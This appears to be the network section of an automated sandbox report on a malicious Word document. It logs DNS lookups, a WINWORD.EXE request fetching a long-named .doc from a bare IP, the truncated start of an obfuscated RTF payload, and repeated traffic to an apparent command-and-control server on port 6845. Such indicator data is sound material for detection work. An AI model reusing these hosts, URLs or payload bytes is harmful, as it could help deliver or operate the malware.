                                                                                                                                                                                                Sep 30, 2024 16:24:40.617487907 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617513895 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617566109 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617605925 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617671013 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617683887 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617708921 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617712021 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617750883 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617753029 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617762089 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617773056 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617794037 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617796898 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617805958 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617827892 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617830992 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617839098 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617861986 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617862940 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617872953 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617889881 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617901087 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617903948 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.617932081 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618216038 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618244886 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618254900 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618256092 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618288994 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618472099 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618482113 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618499041 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618510962 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618515015 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618521929 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618532896 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618544102 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618546009 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618555069 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618570089 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618573904 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618585110 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618592978 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618604898 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618617058 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618632078 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618652105 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618801117 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618812084 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618824005 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618834972 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618844986 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618854046 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618855000 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618861914 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618874073 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618885040 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618889093 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618896961 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618907928 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618921041 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618925095 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618935108 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618941069 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618946075 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618956089 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618971109 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618973017 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618985891 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618995905 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.618998051 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.619012117 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.619019985 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.619024038 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.619039059 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.619048119 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.619074106 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.619081974 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.620187044 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.658576012 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.658613920 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.658626080 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.658637047 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.658648014 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.658660889 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.658674955 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.658699036 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.658715963 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.658760071 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.660686970 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.660744905 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.660754919 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.660804033 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.660835981 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.660846949 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.660857916 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.660868883 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:40.660881996 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:40.660900116 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.206398010 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.211446047 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.211523056 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.211524963 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.211566925 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.216414928 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.216428041 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.216476917 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.216483116 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.216516972 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.216552019 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.216593981 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221323967 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221365929 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221384048 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221431017 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221602917 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221611977 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221620083 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221636057 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221643925 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221996069 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.226443052 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.226455927 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.226543903 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.227164984 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.227225065 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:52.283937931 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:52.285682917 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:52.290596008 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:25:22.984828949 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:25:22.986370087 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:25:22.991338015 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:25:44.652101040 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:25:45.010564089 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:25:45.618968010 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:25:46.820199966 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:25:49.316179991 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:25:53.756179094 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:25:53.757627010 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:25:53.762523890 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:25:54.120981932 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:26:03.808603048 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:26:05.467186928 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:26:28.211039066 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:26:28.212412119 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:26:28.218127012 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:26:59.028350115 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:26:59.031954050 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:26:59.036906958 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:27:29.840702057 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:27:29.846338987 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:27:29.852514982 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:28:00.723208904 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:28:00.726449013 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:28:00.733392954 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:28:31.610605955 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:28:31.612801075 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:28:31.617768049 CEST68454917445.90.89.98192.168.2.22

                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Sep 30, 2024 16:24:07.809972048 CEST5456253192.168.2.228.8.8.8
                                                                                                                                                                                                Sep 30, 2024 16:24:07.830305099 CEST53545628.8.8.8192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:10.514309883 CEST5291753192.168.2.228.8.8.8
                                                                                                                                                                                                Sep 30, 2024 16:24:10.530066013 CEST53529178.8.8.8192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:10.531833887 CEST6275153192.168.2.228.8.8.8
                                                                                                                                                                                                Sep 30, 2024 16:24:10.541604042 CEST53627518.8.8.8192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:15.172908068 CEST5789353192.168.2.228.8.8.8
                                                                                                                                                                                                Sep 30, 2024 16:24:15.188206911 CEST53578938.8.8.8192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:15.205696106 CEST5482153192.168.2.228.8.8.8
                                                                                                                                                                                                Sep 30, 2024 16:24:15.225506067 CEST53548218.8.8.8192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:17.548057079 CEST5471953192.168.2.228.8.8.8
                                                                                                                                                                                                Sep 30, 2024 16:24:17.561928988 CEST53547198.8.8.8192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:17.563815117 CEST4988153192.168.2.228.8.8.8
                                                                                                                                                                                                Sep 30, 2024 16:24:17.571351051 CEST53498818.8.8.8192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:32.630136967 CEST5499853192.168.2.228.8.8.8
                                                                                                                                                                                                Sep 30, 2024 16:24:32.637216091 CEST53549988.8.8.8192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:37.024596930 CEST5278153192.168.2.228.8.8.8
                                                                                                                                                                                                Sep 30, 2024 16:24:37.031922102 CEST53527818.8.8.8192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:38.636948109 CEST6392653192.168.2.228.8.8.8
                                                                                                                                                                                                Sep 30, 2024 16:24:38.647865057 CEST53639268.8.8.8192.168.2.22

                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Sep 30, 2024 16:24:07.809972048 CEST192.168.2.228.8.8.80x2745Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:10.514309883 CEST192.168.2.228.8.8.80xdbf0Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:10.531833887 CEST192.168.2.228.8.8.80xc91aStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:15.172908068 CEST192.168.2.228.8.8.80x1100Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:15.205696106 CEST192.168.2.228.8.8.80x2664Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:17.548057079 CEST192.168.2.228.8.8.80xb6ecStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:17.563815117 CEST192.168.2.228.8.8.80xd97eStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:32.630136967 CEST192.168.2.228.8.8.80xe605Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:37.024596930 CEST192.168.2.228.8.8.80xf864Standard query (0)maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.proA (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:38.636948109 CEST192.168.2.228.8.8.80x3efStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Sep 30, 2024 16:24:07.830305099 CEST8.8.8.8192.168.2.220x2745No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:07.830305099 CEST8.8.8.8192.168.2.220x2745No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:10.530066013 CEST8.8.8.8192.168.2.220xdbf0No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:10.530066013 CEST8.8.8.8192.168.2.220xdbf0No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:10.541604042 CEST8.8.8.8192.168.2.220xc91aNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:10.541604042 CEST8.8.8.8192.168.2.220xc91aNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:15.188206911 CEST8.8.8.8192.168.2.220x1100No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:15.188206911 CEST8.8.8.8192.168.2.220x1100No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:15.225506067 CEST8.8.8.8192.168.2.220x2664No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:15.225506067 CEST8.8.8.8192.168.2.220x2664No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:17.561928988 CEST8.8.8.8192.168.2.220xb6ecNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:17.561928988 CEST8.8.8.8192.168.2.220xb6ecNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:17.571351051 CEST8.8.8.8192.168.2.220xd97eNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:17.571351051 CEST8.8.8.8192.168.2.220xd97eNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:32.637216091 CEST8.8.8.8192.168.2.220xe605No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:32.637216091 CEST8.8.8.8192.168.2.220xe605No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:32.637216091 CEST8.8.8.8192.168.2.220xe605No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:32.637216091 CEST8.8.8.8192.168.2.220xe605No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:37.031922102 CEST8.8.8.8192.168.2.220xf864No error (0)maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro45.90.89.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                Sep 30, 2024 16:24:38.647865057 CEST8.8.8.8192.168.2.220x3efNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                • og1.in
                                                                                                                                                                                                • raw.githubusercontent.com
                                                                                                                                                                                                • 91.134.96.177
                                                                                                                                                                                                • geoplugin.net

                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.224916991.134.96.177803272C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 30, 2024 16:24:21.634495974 CEST497OUTGET /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Host: 91.134.96.177
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250706911 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:22 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                Last-Modified: Mon, 30 Sep 2024 06:43:59 GMT
                                                                                                                                                                                                ETag: "1c3d2-62350879de951"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 115666
                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/msword
                                                                                                                                                                                                Data Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 32 6e 54 55 59 51 47 4b 5a 30 79 38 64 63 76 44 70 73 6e 70 58 54 38 69 56 75 78 34 46 59 6d 65 58 70 6f 42 47 70 4e 79 61 31 66 71 37 47 63 44 65 36 42 58 71 46 6c 77 51 4e 76 34 54 38 48 4a 77 4e 70 36 5a 6a 47 62 77 4a 6c 62 6a 6e 75 63 52 62 77 4d 33 58 37 48 46 4f 55 57 64 37 72 32 50 7a 76 31 37 39 6f 55 6c 51 66 42 38 45 6a 6a 4e 77 55 35 71 4d 34 31 37 55 34 42 51 57 50 37 36 42 57 6a 59 39 76 75 44 73 6d 4d 78 63 79 71 63 64 44 54 71 6c 5a 52 43 42 35 70 53 4f 6f 6f 42 55 30 30 59 6a 56 39 54 44 57 76 73 79 58 43 4a 43 59 4b 6a 6d 55 6f 66 31 75 47 7d 0d 0d 7b 5c 31 37 34 38 35 31 31 31 35 39 31 5b 32 32 35 31 2b 29 3b 35 2f 21 40 2a 3a 34 5f 5b 3f 39 60 39 b5 27 7c 3e 21 39 3c 21 5e 33 25 2b 5e 7c 7e 25 2a 3f 2b 32 3c 37 25 3a b0 60 3f 5d 31 7c 3f 3d 2c 38 25 a7 7e 23 2f 3a 25 3f 3c 3c 21 7c 24 36 25 2b 3f 39 25 21 32 3f b0 25 3d 5f 5d 31 31 27 27 39 3f 33 37 25 38 7e 37 3f 24 2f 2c 23 b5 26 2b 32 3a 2f 29 5f a7 27 3b 2d 5d 7c 3f 3d 21 2a 29 3f 2a 28 5d [TRUNCATED]
                                                                                                                                                                                                Data Ascii: {\rtf1{\*\2nTUYQGKZ0y8dcvDpsnpXT8iVux4FYmeXpoBGpNya1fq7GcDe6BXqFlwQNv4T8HJwNp6ZjGbwJlbjnucRbwM3X7HFOUWd7r2Pzv179oUlQfB8EjjNwU5qM417U4BQWP76BWjY9vuDsmMxcyqcdDTqlZRCB5pSOooBU00YjV9TDWvsyXCJCYKjmUof1uG}{\17485111591[2251+);5/!@*:4_[?9`9'|>!9<!^3%+^|~%*?+2<7%:`?]1|?=,8%~#/:%?<<!|$6%+?9%!2?%=_]11''9?37%8~7?$/,#&+2:/)_';-]|?=!*)?*(]&44`1*8?:@<_$,26=#6#`?^~$59></%~%%=*?4@.4=??24~?_=%).^_^[*1|7#$*$%>78.$/.)7_]?,284)0+`/7*6>_+~55>*9;@=2|)&%6;?@/~/?=,?313$!~94#3[[~4_(?]:@~[`%##>!!`7$!+#&,~=[#?*'_];^3][6!@|?;%8<@<])8.#-82>='_/7766:`8*_*`,~?<82:[<%?%?/._2;[/?7?*40,^.!?(@]%4^!:~%-@(4'58!3:)(+=?-24?^?;?=?`_[*$;^_;;8#.7='6:_**/56-;=%]58^,#<*.%/*%8)(&#($%||!-.|8|`)0'!8.?[@(%&%;4-;%??[[96`=/077<.3##(**7??)1=31'%5*54~]`[0%&<$]?0;%2,)%:6$`[+&2?%2[~7]]?_9$$8?]??_[5%)$05?.6%3|6.3?|@~-::=<?;%|50;0^?29[??_?_:#!(%9[*'@51/2`?~!+/*.!-]?)^`??])=&#'*@6?,[=/~?@?^?279;5=&'??'`|@;
